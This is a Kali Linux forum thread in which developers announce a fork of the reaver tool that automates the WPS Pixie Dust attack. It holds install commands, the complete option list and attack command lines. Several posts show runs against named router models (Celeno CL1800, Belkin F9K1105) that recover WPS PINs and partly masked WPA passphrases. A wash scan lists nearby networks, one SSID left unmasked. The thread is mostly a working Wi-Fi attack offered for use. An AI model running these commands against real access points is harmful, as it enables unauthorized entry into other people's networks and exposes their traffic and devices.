Page 1 of 11 123 ... LastLast
Results 1 to 10 of 107

Thread: Reaver modfication for Pixie Dust Attack

  1. #1
    Member
    Join Date
    Apr 2015
    Posts
    39

    Reaver modfication for Pixie Dust Attack

    Hello

    The community has made modifications in reaver for him to do the pixie dust attack and automate the process to recover the pin.

    Other attacks were implemented (Pin Generator) and some improvements have been made.

    The development is constant and anyone is welcome to help



    Here is our contribution

    GitHub
    https://github.com/t6x/reaver-wps-fork-t6x



    Overview

    reaver-wps-fork-t6x is a modification done from a fork of reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    This modified version uses the attack Pixie Dust to find the correct pin number of wps

    The attack used in this version was developed by Wiire (ht tps://github.com/wiire/pixiewps)



    Install Required Libraries and Tools

    Libraries for reaver

    Code:
    sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
    Tools

    Code:
    You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)


    Compile and Install

    Code:
    Build Reaver
    
          cd reaver-wps-fork-t6x-master
          cd src
          ./configure
          make
    
    Install Reaver
    
          sudo make install


    Usage - Reaver

    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<wlan>          Name of the monitor-mode interface to use
            -b, --bssid=<mac>               BSSID of the target AP
    
    Optional Arguments:
            -m, --mac=<mac>                 MAC of the host system
            -e, --essid=<ssid>              ESSID of the target AP
            -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
            -o, --out-file=<file>           Send output to a log file [stdout]
            -s, --session=<file>            Restore a previous session file
            -C, --exec=<command>            Execute the supplied command upon successful pin recovery
            -D, --daemonize                 Daemonize reaver
            -a, --auto                      Auto detect the best advanced options for the target AP
            -f, --fixed                     Disable channel hopping
            -5, --5ghz                      Use 5GHz 802.11 channels
            -v, --verbose                   Display non-critical warnings (-vv for more)
            -q, --quiet                     Only display critical messages
            -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
            -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
            -h, --help                      Show help
    
    Advanced Options:
            -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
            -d, --delay=<seconds>           Set the delay between pin attempts [1]
            -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
            -g, --max-attempts=<num>        Quit after num pin attempts
            -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
            -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
            -t, --timeout=<seconds>         Set the receive timeout period [5]
            -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
            -A, --no-associate              Do not associate with the AP (association must be done by another application)
            -N, --no-nacks                  Do not send NACK messages when out of order packets are received
            -S, --dh-small                  Use small DH keys to improve crack speed
            -L, --ignore-locks              Ignore locked state reported by the target AP
            -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
            -n, --nack                      Target AP always sends a NACK [Auto]
            -w, --win7                      Mimic a Windows 7 registrar [False]
            -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
            -1, --p1-index                  Set initial array index for the first half of the pin [False]
            -2, --p2-index                  Set initial array index for the second half of the pin [False]
            -P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
            -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
    
    Example:
            reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

    Option (K)

    Code:
    The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
        
    *Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)

    Option (P)

    Code:
    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:
    
    - Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
    
    - Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
    
    - For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.

    Usage - wash

    Code:
    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<iface>              Interface to capture packets on
            -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
    
    Optional Arguments:
            -c, --channel=<num>                  Channel to listen on [auto]
            -o, --out-file=<file>                Write data to file
            -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
            -D, --daemonize                      Daemonize wash
            -C, --ignore-fcs                     Ignore frame checksum errors
            -5, --5ghz                           Use 5GHz 802.11 channels
            -s, --scan                           Use scan mode
            -u, --survey                         Use survey mode [default]
            -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
            -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
            -h, --help                           Show help
    
    Example:
            wash -i mon0


    Example

    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching mon0 to channel 1
    [?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
    [+] Waiting for beacon from A.:9.:D.:....:....:...
    [+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c6:66:a6:72:37:6d:......
    [P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] WPS Model Serial Number: A978FD123BC
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
    [P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
    [+] Sending M2 message
    [P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
    [P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: dd:09:bd:24:......
    [Pixie-Dust][*] PSK2: 77:e0:dd:00:......
    [Pixie-Dust]   [+] WPS pin: 9178....
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: A.:9.:D.:3.:..:..
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '9178....'
    [Reaver Test] [+] WPA PSK: '112233'
    [Reaver Test] [+] AP SSID: '....'

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U


    Any problem and suggestion, contact someone who is helping in the project
    Last edited by t6_x; 2015-05-05 at 04:22 PM.

  2. #2
    Junior Member
    Join Date
    Mar 2015
    Posts
    3
    i like that way you think. it makes everything easier on the long run -good job!

    but get your sources right :

    perfekt example:
    https://forums.kali.org/showthread.p...-WPS-Attack%29

  3. #3
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    301
    hi
    thank you very much for your great contribution!!!!!!
    TNX

  4. #4
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Awesome Sauce !! Nice job indeed.

    When run from root I get error below. yes I did sudo make install after compile.
    Code:
    root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
    [+] Sending M2 message
    [P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
    [P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
    [Pixie-Dust]   [*] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    sh: 1: ./reaver: not found
    When run from src directory It works........
    Code:
    root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
    [+] Sending M2 message
    [P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
    [P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
    [Pixie-Dust]   [*] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '8127****'
    [Reaver Test] [+] WPA PSK: 'TG1672GD8****'
    [Reaver Test] [+] AP SSID: 'TG1672GE2'
    Probably my fault, just post my result, great job

  5. #5
    Member
    Join Date
    Apr 2015
    Posts
    39
    Probably my fault, just post my result, great job
    ops, forgot to commit to the github lol, is my fault sorry

    Commit done

    sorry for that

    I add a new option (-Z), with the -Z option he does not try to catch the pass automatically, it stops executing when it finishes running the pixiewps

    I will add another option to have an option to output data to file, when you're ready I give commits

    I will improve a bit the initial post

    sorry again.

  6. #6
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    U Fixed it.

    -Z works correctly also

  7. #7
    Job well done =).
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Search: https://www.kali.org/search/
    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: http://tools.kali.org/

  8. #8
    Member
    Join Date
    Apr 2015
    Posts
    39
    Thank you very much, g0tmi1k



    New version available

    -P Option of the wash created by t6x(displays the output of the wash with pipes)

    Code:
    root @ kali: ~ / # wash -i mon0 -P
    XX: XX: XX: XX: XX: XX | 1 | -64 | 1.0 | No | Wifi1
    XX: XX: XX: XX: XX: XX | 2 | -53 | 1.0 | No | Wifi2

    -P Option of reaver created by DataHead (M3 Loop)

    Code:
    Reaver remains in the loop M3 stage
    Last edited by t6_x; 2015-04-16 at 04:48 AM.

  9. #9
    Senior Member
    Join Date
    Mar 2015
    Posts
    127

    Red face

    Nice work....
    -P option works great, take less screen space if multiple terminals running.
    Code:
    wash -i wlan1mon -P
    00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
    00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
    00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
    00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
    00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
    00:00:00:00:23:97| 1|-63|1.0|No |TH0000
    00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
    00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
    00:00:00:00:37:56| 6|-47|1.0|No |133 00000
    00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
    00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
    00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
    00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
    00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
    00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
    00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
    00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
    00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
    00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
    00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
    00:00:00:00:03:D9|11|-55|1.0|No |NET000000
    00:00:00:00:E8:86|11|-54|1.0|No |9060000000
    00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
    00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
    00:00:00:00:45:00|11|-60|1.0|No |Pan000000
    Maybe make change on your fork GitHub page:
    Build Reaver

    cd reaver-1.4 to cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Also thanks for the credit.... but u typo my name.


    Question/Idea
    if option -K1 fail, does it automatically try -K2 or K3?
    if -K3 fail, does it check -K1 etc?

    or

    user must enter new command line each time?
    Last edited by nuroo; 2015-04-30 at 02:42 PM.

  10. #10
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Another idea... have all the extra stuff print only with verbosity mode selected

    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from B4:75:0E:XX:XX:XX
    [+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Number: F9K1105 v2
    [+] Received M1 message
    [P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a:3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:11:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92:b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62:62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26:47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35:96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c:c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62:a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f1:a7:80:01:31:e2:14:02:4e
    [P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40:5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
    [+] Sending M2 message
    [P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7:00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
    [P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63:4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
    Segmentation fault
    Last edited by soxrok2212; 2015-04-14 at 10:50 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •